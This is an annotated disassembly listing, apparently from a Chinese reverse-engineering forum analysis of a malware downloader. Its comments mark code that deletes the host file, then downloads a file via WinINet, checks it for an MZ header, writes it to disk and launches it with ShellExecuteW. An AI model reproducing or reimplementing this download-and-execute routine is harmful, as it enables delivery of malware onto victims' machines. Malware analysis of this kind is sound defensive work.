004026C6   .  03D0               add     edx, eax                         ;  定位PE头
004026C8   .  0FB74A 06          movzx   ecx, word ptr [edx+6]            ;  ecx=节数
004026CC   .  83C2 14            add     edx, 14
004026CF   .  0FB702             movzx   eax, word ptr [edx]              ;  eax=可选头大小
004026D2   .  40                 inc     eax
004026D3   .  40                 inc     eax
004026D4   .  40                 inc     eax
004026D5   .  40                 inc     eax
004026D6   .  03D0               add     edx, eax                         ;  定位节表
004026D8   .  B8 28000000        mov     eax, 28
004026DD   .  49                 dec     ecx
004026DE   >  03D0               add     edx, eax
004026E0   .  49                 dec     ecx
004026E1   .^ 75 FB              jnz     short 004026DE                   ;  定位资源节
004026E3   .  8B42 08            mov     eax, dword ptr [edx+8]
004026E6   .  C1E8 09            shr     eax, 9
004026E9   .  40                 inc     eax
004026EA   .  C1E0 09            shl     eax, 9
004026ED   .  0342 14            add     eax, dword ptr [edx+14]          ;  文件偏移
004026F0   .  8B7D E4            mov     edi, dword ptr [ebp-1C]
004026F3   .  03F8               add     edi, eax
004026F5   .  FF75 EC            push    dword ptr [ebp-14]
004026F8   .  FF55 38            call    dword ptr [ebp+38]
004026FB   .  BE 2C010000        mov     esi, 12C
00402700   >  57                 push    edi
00402701   .  FF55 44            call    dword ptr [ebp+44]               ;  删除宿主
00402704   .  85C0               test    eax, eax
00402706   .  75 0D              jnz     short 00402715
00402708   .  6A 01              push    1
0040270A   .  68 E8030000        push    3E8
0040270F   .  FF55 2C            call    dword ptr [ebp+2C]               ;  SleepEx 直到删除成功
00402712   .  4E                 dec     esi
00402713   .^ 75 EB              jnz     short 00402700
00402715   >  33F6               xor     esi, esi

利用wininet api进行下载,然后执行。
[Asm] 纯文本查看 复制代码
00402715   >  33F6               xor     esi, esi
00402717   . |56                 push    esi
00402718   . |56                 push    esi
00402719   . |56                 push    esi
0040271A   . |6A 00              push    0
0040271C   . |B9 06000000        mov     ecx, 6
00402721   . |FF55 08            call    dword ptr [ebp+8]
00402724   . |50                 push    eax
00402725   . |FF55 24            call    dword ptr [ebp+24]               ;  InternetOpenW
00402728   . |85C0               test    eax, eax
0040272A   .^\74 E9              je      short 00402715
0040272C   .  8945 D8            mov     dword ptr [ebp-28], eax
0040272F   .  8B7D D0            mov     edi, dword ptr [ebp-30]
00402732   .  B9 03000000        mov     ecx, 3
00402737   .  FF55 08            call    dword ptr [ebp+8]
0040273A   .  AB                 stos    dword ptr es:[edi]
0040273B   .  B9 04000000        mov     ecx, 4
00402740   .  FF55 08            call    dword ptr [ebp+8]
00402743   .  AB                 stos    dword ptr es:[edi]
00402744   .  33C9               xor     ecx, ecx
00402746   .  51                 push    ecx
00402747   .  51                 push    ecx
00402748   .  6A 03              push    3
0040274A   .  51                 push    ecx
0040274B   .  51                 push    ecx
0040274C   .  8B45 AC            mov     eax, dword ptr [ebp-54]
0040274F   .  50                 push    eax
00402750   .  B1 08              mov     cl, 8
00402752   .  FF55 08            call    dword ptr [ebp+8]
00402755   .  50                 push    eax
00402756   .  FF75 D8            push    dword ptr [ebp-28]
00402759   .  FF55 20            call    dword ptr [ebp+20]               ;  InternetConnectW
0040275C   .  8945 8C            mov     dword ptr [ebp-74], eax
0040275F   .  33C0               xor     eax, eax
00402761   .  AB                 stos    dword ptr es:[edi]
00402762   .  8945 CC            mov     dword ptr [ebp-34], eax
00402765   .  8945 C8            mov     dword ptr [ebp-38], eax
00402768   .  8945 A8            mov     dword ptr [ebp-58], eax
0040276B   .  FF55 00            call    dword ptr [ebp]
0040276E   .  33C0               xor     eax, eax
00402770   .  8BD0               mov     edx, eax
00402772   >  8B45 A8            mov     eax, dword ptr [ebp-58]
00402775   .  FF55 04            call    dword ptr [ebp+4]
00402778   .  85D2               test    edx, edx
0040277A   .  74 04              je      short 00402780
0040277C   .  38D0               cmp     al, dl
0040277E   .  74 0C              je      short 0040278C
00402780   >  8AD0               mov     dl, al
00402782   .  B8 01000000        mov     eax, 1
00402787   .  52                 push    edx
00402788   .  FF55 00            call    dword ptr [ebp]                  ;  发送下载请求
00402878   > /51                 push    ecx
00402879   . |56                 push    esi
0040287A   . |FF75 C0            push    dword ptr [ebp-40]
0040287D   . |57                 push    edi
0040287E   . |FF75 C8            push    dword ptr [ebp-38]
00402881   . |FF55 10            call    dword ptr [ebp+10]               ;  wininet.InternetReadFile
004028D1   .  8945 C0            mov     dword ptr [ebp-40], eax
004028D4   .  8945 E0            mov     dword ptr [ebp-20], eax
004028D7   .  8B45 BC            mov     eax, dword ptr [ebp-44]
004028DA   .  8B00               mov     eax, dword ptr [eax]
004028DC   .  66:3D 4D5A         cmp     ax, 5A4D                         ;  判断下载完的程序的DOS头
004028E0   .  0F84 8E000000      je      00402974
00402976   .  50                 push    eax
00402977   .  68 80000000        push    80
0040297C   .  6A 02              push    2
0040297E   .  50                 push    eax
0040297F   .  6A 02              push    2
00402981   .  68 00000040        push    40000000
00402986   .  8B45 A8            mov     eax, dword ptr [ebp-58]
00402989   .  B4 04              mov     ah, 4
0040298B   .  FF55 04            call    dword ptr [ebp+4]
0040298E   .  8ACC               mov     cl, ah
00402990   .  FF55 08            call    dword ptr [ebp+8]
00402993   .  50                 push    eax
00402994   .  FF55 50            call    dword ptr [ebp+50]               ;  CreateFileW
00402997   .  8BF8               mov     edi, eax
00402999   .  33C0               xor     eax, eax
0040299B   .  50                 push    eax
0040299C   .  8D45 C4            lea     eax, dword ptr [ebp-3C]
0040299F   .  50                 push    eax
004029A0   .  FF75 E0            push    dword ptr [ebp-20]
004029A3   .  FF75 9C            push    dword ptr [ebp-64]
004029A6   .  57                 push    edi
004029A7   .  FF55 48            call    dword ptr [ebp+48]               ;  WriteFile
004029AA   .  57                 push    edi
004029AB   .  FF55 38            call    dword ptr [ebp+38]               ;  CloseHandle
004029AE   .  8B75 F4            mov     esi, dword ptr [ebp-C]
004029B1   .  56                 push    esi
004029B2   .  51                 push    ecx
004029B3   .  FF55 40            call    dword ptr [ebp+40]               ;  GetCurrentDirectoryW
004029B6   .  8B45 A8            mov     eax, dword ptr [ebp-58]
004029B9   .  B4 04              mov     ah, 4
004029BB   .  FF55 04            call    dword ptr [ebp+4]
004029BE   .  8ACC               mov     cl, ah
004029C0   .  FF55 08            call    dword ptr [ebp+8]
004029C3   .  50                 push    eax
004029C4   .  56                 push    esi
004029C5   .  B9 01000000        mov     ecx, 1
004029CA   .  FF55 08            call    dword ptr [ebp+8]
004029CD   .  50                 push    eax
004029CE   .  56                 push    esi
004029CF   .  FF55 6C            call    dword ptr [ebp+6C]               ;  swprintf
004029D2   .  83C4 18            add     esp, 18
004029D5   .  33FF               xor     edi, edi
004029D7   .  57                 push    edi
004029D8   .  57                 push    edi
004029D9   .  57                 push    edi
004029DA   .  56                 push    esi
004029DB   .  B9 02000000        mov     ecx, 2
004029E0   .  FF55 08            call    dword ptr [ebp+8]
004029E3   .  50                 push    eax
004029E4   .  57                 push    edi
004029E5   .  FF55 0C            call    dword ptr [ebp+C]                ;  shell32.ShellExecuteW

[Asm] 纯文本查看 复制代码



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